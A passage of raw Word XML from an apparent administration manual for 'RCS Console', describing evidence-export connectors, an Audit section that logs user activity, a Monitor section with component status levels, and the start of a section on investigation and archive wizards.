              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Destination</w:t>
            </w:r>
            <w:r w:rsidR="009E4B6A">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] if type is Local </w:t>
            </w:r>
            <w:r w:rsidR="008661DE">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>it’s</w:t>
            </w:r>
            <w:r w:rsidR="009E4B6A">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> a local folder path where to export evidences (e.g. “C:\RCSEvidences”), if type is Remote </w:t>
            </w:r>
            <w:r w:rsidR="008661DE">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">it’s </w:t>
            </w:r>
            <w:r w:rsidR="009E4B6A">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">the remote RCS </w:t>
            </w:r>
            <w:r w:rsidR="008661DE">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Archive</w:t>
            </w:r>
            <w:r w:rsidR="009E4B6A">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> IP address.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C37A55" w:rsidRPr="000942D6" w:rsidRDefault="00C37A55" w:rsidP="00C37A55">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C37A55" w:rsidRPr="000942D6" w:rsidRDefault="00C37A55" w:rsidP="00E57195">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000942D6">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Process previous evidence</w:t>
            </w:r>
            <w:r w:rsidR="008661DE">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="00E57195">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>if selected, allows to process all the previously stored evidences.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00FE0DFD" w:rsidRDefault="00FE0DFD" w:rsidP="00FE0DFD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C37A55" w:rsidRPr="000942D6" w:rsidRDefault="00C37A55" w:rsidP="00FE0DFD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FE0DFD" w:rsidRPr="000942D6" w:rsidRDefault="00FE0DFD" w:rsidP="00FE0DFD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The image above shows the New Connector window within [ System &gt; Connectors ] </w:t>
      </w:r>
      <w:r w:rsidR="00D539C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Console </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>section.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2314A" w:rsidRDefault="00F2314A" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F2314A" w:rsidRDefault="00F2314A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2314A" w:rsidRPr="00F57BCA" w:rsidRDefault="00F2314A" w:rsidP="00A76B3F">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc372642530"/>
      <w:r w:rsidRPr="00F57BCA">
        <w:lastRenderedPageBreak/>
        <w:t>Audit: Understanding Audit Entries</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p w:rsidR="00F2314A" w:rsidRPr="00F57BCA" w:rsidRDefault="00F2314A" w:rsidP="00F2314A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002A3E2E" w:rsidRPr="000942D6" w:rsidRDefault="00F57BCA" w:rsidP="002A3E2E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F57BCA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The Audit section allows to monitor Administrators, Technicians and Evidence Analysts activities performed within RCS Console.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A3E2E" w:rsidRPr="000942D6" w:rsidRDefault="002A3E2E" w:rsidP="002A3E2E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002A3E2E" w:rsidRDefault="002A3E2E" w:rsidP="002A3E2E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="549D5E85" wp14:editId="63DED097">
            <wp:extent cx="6120130" cy="3672205"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>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6120130" cy="3672205"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A3E2E" w:rsidRPr="002D7F2D" w:rsidRDefault="002A3E2E" w:rsidP="002A3E2E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002A3E2E" w:rsidRPr="002D7F2D" w:rsidRDefault="00117549" w:rsidP="002A3E2E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>11.3</w:t>
      </w:r>
      <w:r w:rsidR="002A3E2E" w:rsidRPr="000942D6">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> [ RCS Console ] </w:t>
      </w:r>
      <w:r w:rsidR="002A3E2E">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Audit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A3E2E" w:rsidRDefault="002A3E2E" w:rsidP="002A3E2E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002A3E2E" w:rsidRPr="000942D6" w:rsidRDefault="002A3E2E" w:rsidP="002A3E2E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F2314A" w:rsidRDefault="00FA7939" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In order to access Audit section you need an Administrator role user with “System auditing” permission.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA7939" w:rsidRDefault="00FA7939" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0031367D" w:rsidRDefault="0031367D" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>All the columns present in the Audit section can be filtered in order to focus on specific type of data (e.g. by date, by user, by action). Filtered information can also be exported in CSV format.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA06EB" w:rsidRDefault="00DA06EB" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F2314A" w:rsidRDefault="00F2314A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2314A" w:rsidRPr="00AB213E" w:rsidRDefault="00F2314A" w:rsidP="00A76B3F">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_Toc372642531"/>
      <w:r w:rsidRPr="00AB213E">
        <w:lastRenderedPageBreak/>
        <w:t>Monitor: Tracking RCS Components</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
    </w:p>
    <w:p w:rsidR="00F2314A" w:rsidRPr="00AB213E" w:rsidRDefault="00F2314A" w:rsidP="00F2314A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F2314A" w:rsidRPr="00AB213E" w:rsidRDefault="006932EB" w:rsidP="00F2314A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The Monitor section within RCS Console allows to monitor system status (hardware and software RCS components), delete elements to be monitored since uninstalled, set-up system alerts, change and monitor product license.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2314A" w:rsidRDefault="00F2314A" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A64C6F" w:rsidRDefault="00AB213E" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E9CD6B8" wp14:editId="09E7B7A9">
            <wp:extent cx="6120130" cy="367220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6120130" cy="3672205"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A05E51" w:rsidRPr="002D7F2D" w:rsidRDefault="00A05E51" w:rsidP="00A05E51">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A05E51" w:rsidRPr="002D7F2D" w:rsidRDefault="00117549" w:rsidP="00A05E51">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>11.4</w:t>
      </w:r>
      <w:r w:rsidR="00A05E51" w:rsidRPr="000942D6">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> [ RCS Console ] </w:t>
      </w:r>
      <w:r w:rsidR="00A05E51">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Monitor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A64C6F" w:rsidRDefault="00A64C6F" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A05E51" w:rsidRDefault="00A05E51" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A64C6F" w:rsidRDefault="00A05E51" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The table below summarizes the 3 different types of status in which you can find the RCS components.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A05E51" w:rsidRDefault="00A05E51" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tabellagriglia4-colore1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="10" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1504"/>
        <w:gridCol w:w="1462"/>
        <w:gridCol w:w="6652"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A05E51" w:rsidTr="009D2B01">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05" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="95B3D7" w:themeColor="accent1" w:themeTint="99"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="4F81BD" w:themeColor="accent1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00A05E51" w:rsidRDefault="00A05E51" w:rsidP="00A05E51">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Status </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1462" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="4F81BD" w:themeColor="accent1"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00A05E51" w:rsidRDefault="00A05E51" w:rsidP="00A05E51">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Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6656" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00A05E51" w:rsidRDefault="00A05E51" w:rsidP="00A05E51">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A05E51" w:rsidTr="00807D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5" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00A05E51" w:rsidRPr="00A05E51" w:rsidRDefault="00582DEB" w:rsidP="00582DEB">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:object w:dxaOrig="450" w:dyaOrig="435">
                <v:shape id="_x0000_i1117" type="#_x0000_t75" style="width:22.5pt;height:21.75pt" o:ole="">
                  <v:imagedata r:id="rId367" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1117" DrawAspect="Content" ObjectID="_1446455332" r:id="rId368"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1462" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00A05E51" w:rsidRPr="00A05E51" w:rsidRDefault="00A05E51" w:rsidP="00A05E51">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A05E51">
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Alarm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6656" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00A05E51" w:rsidRDefault="004C7285" w:rsidP="004C7285">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Critical situation: immediately check the component.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A05E51" w:rsidTr="00807D49">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1505" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00A05E51" w:rsidRPr="00A05E51" w:rsidRDefault="00582DEB" w:rsidP="00582DEB">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:object w:dxaOrig="570" w:dyaOrig="495">
                <v:shape id="_x0000_i1118" type="#_x0000_t75" style="width:28.5pt;height:24.75pt" o:ole="">
                  <v:imagedata r:id="rId369" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1118" DrawAspect="Content" ObjectID="_1446455333" r:id="rId370"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1462" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00A05E51" w:rsidRPr="00A05E51" w:rsidRDefault="00A05E51" w:rsidP="00A05E51">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A05E51">
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Warning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6656" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00A05E51" w:rsidRDefault="004C7285" w:rsidP="00A05E51">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Potentially problematic situation: check the component.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A05E51" w:rsidTr="00807D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5" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00A05E51" w:rsidRPr="00A05E51" w:rsidRDefault="00582DEB" w:rsidP="00582DEB">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:object w:dxaOrig="495" w:dyaOrig="465">
                <v:shape id="_x0000_i1119" type="#_x0000_t75" style="width:24.75pt;height:23.25pt" o:ole="">
                  <v:imagedata r:id="rId371" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1119" DrawAspect="Content" ObjectID="_1446455334" r:id="rId372"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1462" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00A05E51" w:rsidRPr="00A05E51" w:rsidRDefault="00A05E51" w:rsidP="00A05E51">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A05E51">
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Running</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6656" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00A05E51" w:rsidRDefault="004C7285" w:rsidP="004C7285">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The component is running properly.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E417AD" w:rsidRDefault="00E417AD" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E417AD" w:rsidRDefault="00E417AD">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2314A" w:rsidRPr="00B31096" w:rsidRDefault="009115D1" w:rsidP="00A76B3F">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="_Toc372642532"/>
      <w:r w:rsidRPr="00B31096">
        <w:lastRenderedPageBreak/>
        <w:t>Investigation Wizard and Archive Wizard</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w:rsidR="00F2314A" w:rsidRPr="00B31096" w:rsidRDefault="00F2314A" w:rsidP="00F2314A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F2314A" w:rsidRPr="004F6D14" w:rsidRDefault="004F6D14" w:rsidP="00F2314A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B31096">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In the RCS Console Home you can find 2 special buttons that allow to quick</w:t>
      </w:r>
      <w:r w:rsidR="00E721EE" w:rsidRPr="00B31096">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ly perform 2 types of activities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00825332" w:rsidRDefault="003A4380" w:rsidP="00F2314A">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:object w:dxaOrig="1440" w:dyaOrig="1440">
          <v:shape id="_x0000_s1503" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:59.25pt;width:90.7pt;height:85.05pt;z-index:251874304;mso-position-horizontal-relative:margin;mso-position-vertical-relative:margin">
            <v:imagedata r:id="rId373" o:title=""/>
            <w10:wrap type="square" anchorx="margin" anchory="margin"/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1503" DrawAspect="Content" ObjectID="_1446455400" r:id="rId374"/>
        </w:object>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:object w:dxaOrig="1440" w:dyaOrig="1440">
          <v:shape id="_x0000_s1502" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:59.25pt;width:90.7pt;height:85.05pt;z-index:251872256;mso-position-horizontal-relative:margin;mso-position-vertical-relative:margin">
            <v:imagedata r:id="rId373" o:title=""/>
            <w10:wrap type="square" anchorx="margin" anchory="margin"/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1502" DrawAspect="Content" ObjectID="_1446455401" r:id="rId375"/>
        </w:object>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tabellagriglia4-colore1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="30" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1666"/>
        <w:gridCol w:w="5812"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E721EE" w:rsidTr="0099641A">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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00E721EE" w:rsidRDefault="00E721EE" w:rsidP="00F64671">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
